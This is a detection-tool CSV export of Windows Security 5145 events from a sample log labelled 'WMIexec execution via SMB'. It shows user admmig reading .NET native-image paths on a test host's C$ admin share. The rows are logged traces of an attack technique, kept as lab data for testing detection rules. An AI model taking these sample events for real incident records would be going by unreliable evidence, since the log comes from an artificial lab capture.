2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
